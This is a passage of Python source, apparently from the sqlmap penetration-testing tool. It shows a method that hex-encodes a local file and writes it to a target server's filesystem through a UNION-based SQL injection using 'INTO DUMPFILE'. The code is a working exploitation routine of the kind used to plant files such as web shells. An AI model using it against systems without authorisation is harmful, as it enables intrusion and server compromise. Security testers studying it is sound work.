(self, localFile, remoteFile, fileType, forceCheck=False)
| 89 | |
| 90 | @stackedmethod |
| 91 | def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): |
| 92 | logger.debug("encoding file to its hexadecimal string value") |
| 93 | |
| 94 | fcEncodedList = self.fileEncode(localFile, "hex", True) |
| 95 | fcEncodedStr = fcEncodedList[0] |
| 96 | fcEncodedStrLen = len(fcEncodedStr) |
| 97 | |
| 98 | if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: |
| 99 | warnMsg = "as the injection is on a GET parameter and the file " |
| 100 | warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen |
| 101 | warnMsg += "bytes, this might cause errors in the file " |
| 102 | warnMsg += "writing process" |
| 103 | logger.warning(warnMsg) |
| 104 | |
| 105 | debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile) |
| 106 | logger.debug(debugMsg) |
| 107 | |
| 108 | pushValue(kb.forceWhere) |
| 109 | kb.forceWhere = PAYLOAD.WHERE.NEGATIVE |
| 110 | sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile) |
| 111 | unionUse(sqlQuery, unpack=False) |
| 112 | kb.forceWhere = popValue() |
| 113 | |
| 114 | warnMsg = "expect junk characters inside the " |
| 115 | warnMsg += "file as a leftover from UNION query" |
| 116 | singleTimeWarnMessage(warnMsg) |
| 117 | |
| 118 | return self.askCheckWrittenFile(localFile, remoteFile, forceCheck) |
| 119 | |
| 120 | def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): |
| 121 | logger.debug("encoding file to its hexadecimal string value") |
nothing calls this directly
no test coverage detected